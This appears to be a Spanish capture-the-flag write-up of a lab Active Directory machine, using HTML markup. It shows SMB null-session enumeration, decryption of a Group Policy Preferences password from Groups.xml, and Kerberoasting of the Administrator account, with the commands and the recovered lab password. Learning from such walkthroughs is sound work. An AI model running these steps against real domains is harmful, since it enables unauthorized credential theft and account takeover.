I"E
<h2 id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo de nmap con:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">nmap</span> <span class="o">-</span><span class="n">sS</span> <span class="o">-</span><span class="n">n</span> <span class="o">-</span><span class="no">Pn</span> <span class="o">-</span><span class="no">T4</span> <span class="o">--</span><span class="nb">open</span> <span class="o">-</span><span class="nb">p</span><span class="o">-</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">10.100</span>
</code></pre></div></div>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<p>Y nos reporto que hay varios puertos abiertos:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">PORT</span>      <span class="no">STATE</span> <span class="no">SERVICE</span>
<span class="mi">53</span><span class="o">/</span><span class="n">tcp</span>    <span class="nb">open</span>  <span class="n">domain</span>
<span class="mi">88</span><span class="o">/</span><span class="n">tcp</span>    <span class="nb">open</span>  <span class="n">kerberos</span><span class="o">-</span><span class="n">sec</span>
<span class="mi">135</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">msrpc</span>
<span class="mi">139</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">netbios</span><span class="o">-</span><span class="n">ssn</span>
<span class="mi">389</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">ldap</span>
<span class="mi">445</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">microsoft</span><span class="o">-</span><span class="n">ds</span>
<span class="mi">464</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">kpasswd5</span>
<span class="mi">593</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">http</span><span class="o">-</span><span class="n">rpc</span><span class="o">-</span><span class="n">epmap</span>
<span class="mi">636</span><span class="o">/</span><span class="n">tcp</span>   <span class="nb">open</span>  <span class="n">ldapssl</span>
<span class="mi">3268</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">globalcatLDAP</span>
<span class="mi">3269</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">globalcatLDAPssl</span>
<span class="mi">5722</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">msdfsr</span>
<span class="mi">9389</span><span class="o">/</span><span class="n">tcp</span>  <span class="nb">open</span>  <span class="n">adws</span>
<span class="mi">47001</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">winrm</span>
<span class="mi">49152</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49153</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49154</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49155</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49157</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49158</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49165</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49170</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
<span class="mi">49171</span><span class="o">/</span><span class="n">tcp</span> <span class="nb">open</span>  <span class="n">unknown</span>
</code></pre></div></div>

<p>Los de interes podrian ser:</p>

<ul>
  <li><strong>53</strong>: DNS</li>
  <li><strong>88</strong>: Protocolo de autenticacion Kerberos</li>
  <li><strong>135</strong>: Microsoft Remote Procedure Call (MSRPC), el <strong>ms</strong> de su nombre es por Microsoft, y RPC es <strong>Remote Procedure Call</strong></li>
  <li><strong>139/445</strong>: NetBIOS-SSN/Microsoft-DS, y SMB y NetBIOS</li>
  <li><strong>389, 636, 3268, 3269</strong>: Corresponde a LDAP, LDAP SSL, Global Catalog LDAP, Global Catalog LDAP SSL</li>
  <li><strong>464</strong>: Cambio de contraseñas de Kerberos (kpasswd5)</li>
</ul>

<p>(Les adelanto que no hare un escaneo para buscar por versiones y servicios que estan corriendo por detras de esos puertos por que en este caso no hace falta)</p>

<h3 id="enumeracion-smb">Enumeracion SMB</h3>

<p>De primeras podemos usar <strong>crackmapexec</strong> sobre SMB para obtener informacion inicial sobre el servicio SMB de la maquina:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crackmapexec</span> <span class="n">smb</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">10.100</span>
</code></pre></div></div>

<p>Y esto nos arroja</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">SMB</span>    <span class="mf">10.10</span><span class="o">.</span><span class="mf">10.100</span>  <span class="mi">445</span>  <span class="no">DC</span>    <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="no">Windows</span> <span class="mf">6.1</span> <span class="no">Build</span> <span class="mi">7601</span> <span class="n">x64</span> <span class="p">(</span><span class="nb">name</span><span class="ss">:DC</span><span class="p">)</span> <span class="p">(</span><span class="n">domain</span><span class="ss">:active</span><span class="p">.</span><span class="nf">htb</span><span class="p">)</span> <span class="p">(</span><span class="n">signing</span><span class="ss">:True</span><span class="p">)</span> <span class="p">(</span><span class="no">SMBv1</span><span class="ss">:False</span><span class="p">)</span>
</code></pre></div></div>

<p>Podemos ver que el nombre es <strong>DC</strong> (Domain Controller), el dominio es <strong>active.htb</strong>, la version de windows, y que no se usa <strong>SMBv1</strong></p>

<p>Para hacer las cosas mas faciles podemos editar el <strong>/etc/hosts</strong> para indicarle que el dominio <strong>active.htb</strong> se resuelva a la IP <strong>10.10.10.100</strong></p>

<p>Para seguir enumerando podemos usar <strong>crackmapexec</strong>, <strong>smbmap</strong>, <strong>smbclient</strong> o <strong>impacket-smbclient</strong>, en mi caso usare de nuevo <strong>crackmapexec</strong> haciendo uso de null session para enumerar recursos compartidos por SMB:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crackmapexec</span> <span class="n">smb</span> <span class="n">active</span><span class="p">.</span><span class="nf">htb</span> <span class="o">-</span><span class="n">u</span> <span class="s1">''</span> <span class="o">-</span><span class="nb">p</span> <span class="s1">''</span> <span class="o">--</span><span class="n">shares</span>
</code></pre></div></div>

<p>Esto nos arroja:</p>

<p><img src="/assets/img/active/2.png" alt="" /></p>

<p>Podemos ver que el unico que no es comun en Windows es el de <strong>Replication</strong>, ademas de que tenemos permisos de lectura, ahora nos conectaremos usando <strong>smbclient</strong> para explorar el directorio:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">smbclient</span> <span class="sr">//</span><span class="n">active</span><span class="p">.</span><span class="nf">htb</span><span class="o">/</span><span class="no">Replication</span> <span class="o">-</span><span class="no">N</span>
</code></pre></div></div>

<p>Despues de explorar entre los directorios encontramos un archivo llamado <strong>Groups.xml</strong> en el directorio: <strong>\active.htb\Replication\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups</strong>, haciendo uso del comando <strong>get Groups.xml</strong> nos los descargamos</p>

<h4 id="curiosidad">Curiosidad</h4>

<p>Cuando usamos crackmapexec para enumerar recursos, vimos que estaba uno con el nombre de <strong>SYSVOL</strong>, el cual es un recurso compartido que almacena informacion de la politicas de grupo y scripts de inicio de sesion, al recurso <strong>SYSVOL</strong> se le pueden hacer replicaciones por medio de <strong>DFSR</strong> o <strong>FRS</strong> (esto depende de la version de Windows server), esto es interesante por que la estructura del recurso <strong>Replication</strong> es similar a la de <strong>SYSVOL</strong>, asi que es posible que se haya hecho una replicacion y por eso mismo encontramos el archivo <strong>Groups.xml</strong> en ese directorio</p>

<h3 id="crackeando-credenciales-de-gpp">Crackeando credenciales de GPP</h3>

<p>Si vemos el contenido del archivo</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span>
<span class="nt">&lt;Groups</span> <span class="na">clsid=</span><span class="s">"{3125E937-EB16-4b4c-9934-544FC6D24D26}"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;User</span> <span class="na">clsid=</span><span class="s">"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"</span> <span class="na">name=</span><span class="s">"active.htb\SVC_TGS"</span> <span class="na">image=</span><span class="s">"2"</span> <span class="na">changed=</span><span class="s">"2018-07-18 20:46:06"</span> <span class="na">uid=</span><span class="s">"{EF57DA28-5F69-4530-A59E-AAB58578219D}"</span><span class="nt">&gt;</span>
        <span class="nt">&lt;Properties</span> <span class="na">action=</span><span class="s">"U"</span> 
            <span class="na">newName=</span><span class="s">""</span> 
            <span class="na">fullName=</span><span class="s">""</span> 
            <span class="na">description=</span><span class="s">""</span> 
            <span class="na">cpassword=</span><span class="s">"edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"</span>
            <span class="na">changeLogon=</span><span class="s">"0"</span> 
            <span class="na">noChange=</span><span class="s">"1"</span> 
            <span class="na">neverExpires=</span><span class="s">"1"</span> 
            <span class="na">acctDisabled=</span><span class="s">"0"</span> 
            <span class="na">userName=</span><span class="s">"active.htb\SVC_TGS"</span><span class="nt">/&gt;</span>
    <span class="nt">&lt;/User&gt;</span>
<span class="nt">&lt;/Groups&gt;</span>
</code></pre></div></div>

<p>Nos podemos dar cuenta que tenemos el hash de una contraseña para el usuario <strong>SVC_TGS</strong>, el ser una contraseña que se almacena en el archivo <strong>Groups.xml</strong> entonces es una contraseña de <strong>preferencias de política de grupo (GPP)</strong>, podemos usar <strong>gpp-decrypt</strong> con el comando:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python3</span> <span class="n">gpp</span><span class="o">-</span><span class="n">decrypt</span><span class="p">.</span><span class="nf">py</span> <span class="o">-</span><span class="n">f</span> <span class="n">groups</span><span class="p">.</span><span class="nf">xml</span>
</code></pre></div></div>

<p>Y la contraseña es: <strong>GPPstillStandingStrong2k18</strong></p>

<p>Ahora podemos usar <strong>crackmapexec</strong> para validarla</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crackmapexec</span> <span class="n">smb</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">10.100</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'SVC_TGS'</span> <span class="o">-</span><span class="nb">p</span> <span class="s1">'GPPstillStandingStrong2k18'</span>
</code></pre></div></div>

<ul>
  <li><strong>u</strong>: Indica el usuario</li>
  <li><strong>p</strong>: Indica la contraseña</li>
</ul>

<p>Si aparace un <strong>+</strong> es que son credenciales validas</p>

<p><img src="/assets/img/active/3.png" alt="" /></p>

<p>Simon, ta buena</p>

<p>Ahora haciendo uso de nuevo de <strong>crackmapexec</strong>  para enumerar recursos pero ahora usando credenciales validas</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crackmapexec</span> <span class="n">smb</span> <span class="mf">10.10</span><span class="o">.</span><span class="mf">10.100</span> <span class="o">-</span><span class="n">u</span> <span class="s1">'SVC_TGS'</span> <span class="o">-</span><span class="nb">p</span> <span class="s1">'GPPstillStandingStrong2k18'</span> <span class="o">--</span><span class="n">shares</span>
</code></pre></div></div>

<p><img src="/assets/img/active/4.png" alt="" /></p>

<p>Nos podemos dar cuenta que tenemos permisos de lectura en varios directorios, en esta caso el que nos interesa es el de <strong>Users</strong>, usaremos <strong>smbclient</strong> para conectarnos</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">smbclient</span> <span class="sr">//</span><span class="n">active</span><span class="p">.</span><span class="nf">htb</span><span class="o">/</span><span class="no">Users</span> <span class="o">-</span><span class="no">U</span> <span class="no">SVC_TGS</span><span class="o">%</span><span class="no">GPPstillStandingStrong2k18</span>
</code></pre></div></div>

<p>Explorando un poco encontramos en el directorio <strong>\active.htb\Users\SVC_TGS\Desktop</strong> la flag de user</p>

<h2 id="escalada-de-privilegios-kerberoasting">Escalada de privilegios (Kerberoasting)</h2>

<p>Como estamos en un Active Directory se esta usando Kerberos podemos probar una tecnica llamada <strong>Kerberoasting</strong>, con la que en este caso podemos obtener las credenciales del usuario <strong>Administrador</strong></p>

<h3 id="breve-explicacion">Breve explicacion</h3>

<p>Kerberoasting es una tecnica que se aprovecha de Kerberos con la cual podemos extraer hashes validos de cuentas de servicio, este ataque funciona solicitando tickets TGS para todos los usuarios que esten disponibles en el dominio, para despues intentar cracker estos tickets de manera offline y obtener las contraseñas.</p>

<p>Kerberoasting se aprovecha de la obtencion de <strong>TGS</strong>, es decir, cuando un usuario intenta acceder a un servicio, se entrega su <strong>TGS</strong> al <strong>KDC</strong> con una solicitud de un ticket para ese servicio, entonces el <strong>KDC</strong> verifica si el <strong>TGS</strong> es valido, y si lo es, le entrega un ticket para ese servicio que el usuario intento acceder, entonces si nosotros comprometemos un usuario con un <strong>TGS</strong> valido, podemos solicitar los demas <strong>TGS</strong> de los usuario que tengan un <strong>SPN</strong> en un Domain Controller</p>

<p>En este caso como ya comprometimos el usuario <strong>SVC_TGS</strong> y evidetemente tenemos unas credenciales validas y nos dan una entrada al dominio, entonces podemos empezar por ahi, ahora usaremos <strong>GetUserSPNs.py</strong> para solicitar los <strong>TGS</strong> de los usuarios con un <strong>SPN</strong>:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="no">GetUserSPNs</span><span class="p">.</span><span class="nf">py</span> <span class="s1">'active.htb/SVC_TGS:GPPstillStandingStrong2k18'</span> <span class="o">-</span><span class="n">request</span>
</code></pre></div></div>

<ul>
  <li>El <strong>-request</strong> se usa para solicitar los TGS para los SPN</li>
</ul>

<p><img src="/assets/img/active/5.png" alt="" /></p>

<p>Y obtivimos un <strong>TGS</strong> para el <strong>SPN</strong> <strong>active/CIFS:445</strong> el cual es del usuario <strong>Administrator</strong></p>

<p>Ahora lo crackeamos de forma offline con John:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john --wordlist=/usr/share/wordlist/rockyou.txt hash
</code></pre></div></div>

<p>Y obtenemos su contraseña</p>
:ET